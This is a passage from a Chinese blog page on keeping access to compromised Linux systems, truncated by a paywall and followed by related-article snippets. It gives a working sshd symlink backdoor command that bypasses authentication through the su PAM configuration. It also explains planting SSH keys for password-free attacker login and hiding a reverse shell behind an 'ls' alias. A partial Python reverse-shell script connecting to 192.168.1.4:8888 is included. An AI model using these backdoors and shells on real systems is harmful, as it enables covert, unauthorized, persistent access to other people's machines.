Linux权限维持

最新推荐文章于 2024-09-09 12:19:38 发布
最新推荐文章于 2024-09-09 12:19:38 发布
阅读量610 收藏 9
点赞数 19
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SOSKUN/article/details/139769510
sshd软连接后门

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

在/usr/loacl目录下创建一个su软连接指向sshd,再临时配置此sshd监听的端口为12345,当开启了PAM验证机制的时候,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc/pam.d/,对应pam文件名即为软连接文件名,当我们建立名为su的软连接,即使用了su的pam配置文件,而su的配置文件中有这样一句话 auth sufficient pam_rootok.so,对uid为0的root用户无条件通过认证。当我们指定端口为12345时,及使用了su的pam的配置文件,无条件通过认证。

免密公钥

ssh-keygen -t rsa

第一次键入保存公私钥的路径,在输入密码时连续两次键入回车即可实现免密的密钥对,将公钥放在对应用户家目录的.ssh,目录下重命名为authorized_keys,将私钥设置为700权限,即可在攻击机上用-i指定私钥从而实现免密登录

alias后门

alias [别名] "[表达式]"

将ls命令替换为反弹shell

  1. alias 不支持参数传递,只有函数才支持参数传递,所以需要用函数将ls的参数传递,否则受害者执行带参数的ls会报错

  2. 传统的反弹shell反弹后终端就无响应了,很容易被发现,所以使用python脚本

    import os,socket,subprocess;
ret = os.fork()
if ret > 0:
    exit()
else:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("192.168.1.4", 8888))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno
最低0.47元/天 解锁文章

200万优质内容无限畅学
D31imiter
关注
内网渗透-linux权限维持
lza20001103的博客
08-25 1726
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
第144天:内网安全-Linux权限维持&OpenSSH&PAM后门&SSH链接&公私钥登录
最新发布
weixin_71529930的博客
09-09 1298
案例一: 权限维持-Linux-替换版本-OpenSSH 后门原理:替换本身操作系统的 ssh 协议支撑件 openssh,重新安装自定义的 openssh,达到记录帐号密码,也可以采用万能密码连接的功能!查看当前ssh的版本 ssh -V环境准备安装依赖下载替换版本和后门文件解压文件安装openssh也就是把这个文件,复制成外面这个文件并覆盖,所以之前下载的那个应该没啥用哈^_^修改配置万能密码修改版本,version.h文件修改与之前版本一致。
Linux】文件系统中inode与硬链接以及读写权限问题
m0_74774759的博客
11-16 2042
文件=文件内容+文件属性Linux中文件内容与属性是分开存储的。文件内容:在数据块中存着文件属性:在inode中存着Block Group:ext2文件系统会根据分区的大小划分为数个Block Group。而每个Block Group都有着相同的结构组成。政府管理各区的例子超级块(Super Block):存放文件系统本身的结构信息。
Linux链接与硬链接
mrqiuwen的博客
07-10 3891
介绍了Linux系统下链接和硬链接的功能和基本概念,从原理上剖析了二者的区别
Linux学习03-连接硬链接以及修改文件权限
azto的博客
02-19 4040
Linux连接 和 硬连接 硬链接 使用ls -l可以查看文件的详细信息,当是l打头的则表示这个是一个链接文件 创建的硬链接不占用磁盘空间并且硬链接数+1 只有文件才能创建硬链接,目录是不能创建硬链接的 当修改其中一个的内容的时候其他两个也会相对应的修改,如果删除其中一个 硬链接数会减少1 链接 链接相当于快捷键,即使被删除也不会有什么影响。 链接的创建需要一个绝对路径 文件和目录属...
linux_链接,查找,权限,重定向,打包,正则表达式
weixin_63494444的博客
11-11 867
一个点表示当前工作目录,两个点表示上一层工作目录;目录的本质:文件(该文件储存目录项,以链表的形式链接,每个结点都是目录项,创建文件相当于把目录项添加到链表中)如果想在一个目录中添加或者删除目录项,需要获取这个目录的写权限连接:符号链接,单独的文件里面存储了文件路径,类似于指针,指向目录;硬链接:文件以链表形式存于物理文件系统,虚拟文件系统(VFS)与物理文件系统存在一种映射,上图he目录和点目录指向同一个文件,这种映射情形叫硬链接;
linux权限维持.pdf
03-31
Linux权限维持是信息安全领域内一个关键的话题,特别是在对Linux系统进行入侵测试或实际遭受攻击后,保持对系统的访问权限是一个常见需求。以下是关于Linux权限维持的详细介绍: 首先,Linux系统权限维持的方法通常...
Linux 权限维持
weixin_44268185的博客
08-21 211
【代码】Linux 权限维持
连接&硬链接详解
[byte轻骑兵] 的技术小窝!
09-09 7155
连接&硬链接从定义、特定和使用等方敏进行详解
Linux 连接权限问题
weixin_37868901的博客
02-18 6275
linux的链接有两种方式,Hard link 和 Symbolic Link。 首先 linux要打开一个文件: 该文件的inode ----> block(是一个inode目录)----> inode ---->读取文件内容 然后 二者都要在建立连接的目录下建一个文件,占用当前目录的inode条目。 Hl的inode条目直接指向存储的block,等于开了另一个门。 而Sl的...
链接和修改目录的写权限
walle的博客
09-01 8805
有一个uploads目录,还有一个sub/uploads目录,后一个要链接到前一个
连接和硬链接,用户和组,权限
weixin_44675370的博客
04-17 1848
硬链接相当于复制了一份。即使删除源文件,链接文件仍然完整打开。格式是:ln 源文件路径 链接名 连接类似于windows下的快捷方式,格式是: ln -s源文件路径 链接名 源文件路径 应该使用绝对路径,如果使用相对路径,当快捷键文件移动目录,快捷键失效。 ***************************************************************...
linux 添加连接、查看连接、增加文件的执行权限
qq_41221841的博客
09-18 2万+
ln -s 原文件绝对路径 连接地址 #查看连接 ls -al
linux 文件系统的权限问题和涉及到的硬链接
iteye_11584的博客
03-21 235
任何设备在linux下都是文件。 文件即包括windows下的文件又包括windows下的目录,还包括windows下的设备。 一、文件权限的意义 r:可以读这个文件的具体内容; w:可以编辑这个文件的内容,包括增加删除文件的具体内容 但不包括删除该文件; x:文件就具有了可执行的权限-------注意:这里和window不一样,在win中,文件的可执行权限是通过扩展名表现出来的...
linux 安装连接失败,Linux连接原理详解
weixin_42355570的博客
05-03 1304
连接又称符号链接,最大用途为相对路径共享文件,优势如件迁移到另外一块磁盘、分区或其他服务器。具体解析实例如下,在/app/hex/a6/b2/c3/下有文件share.function,现需在b1目录下创建连接文件指向shre.function。/app└── hex├── a1│ ├── b1│ ├── c1│ └── c2├── a2├── a3├── a4├── a5└── a6...
Linux链接命令-ln
热门推荐
刘伟佳的博客
04-06 3万+
链接命令ln,并且介绍了链接和硬链接的特点和区别。
chown -R 改不了链接指向的文件权限
Caso_卡索的博客
11-28 7318
关于chown命令,chown 命令能不能修改一个链接文件的权限呢?
Linux笔记-- 连接 权限位 搜索 别名
weixin_51137217的博客
02-25 555
目录 1.连接 2.权限位 搜索相关命令::: 设置别名: 1.连接 Linux 有一个概念叫做 i 节点 , 一个独立文件都会分配一个 i 节点 对应的通过 i 节点找内容 ln 命令:在文件之间建立链接 -s 加了就是链接 不加就是硬链接 -f 强制 用法: ln [选项] 源文件 目标文件 例如 ln 123.sh /a/[新名字] 不加就是原名 可以用 ls -il 来看看第一列 的节点是否 一样 硬链接 关联 源文件 与 i 节点记录 而 连接 指向 的源文件名
Linux连接连接详解
超人不会飞
11-16 6948
Lnux也有类似于windows下的快捷方式,这种快捷方式在linux下称作硬连接(hard link)和连接(symbolic link,又称作符号链接)。创建链接文件 创建linkfile.txt文件[root@localhost tmp]# touch linkfile.txt [root@localhost tmp]# echo 'testlink' > linkfile.txt 创建硬
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值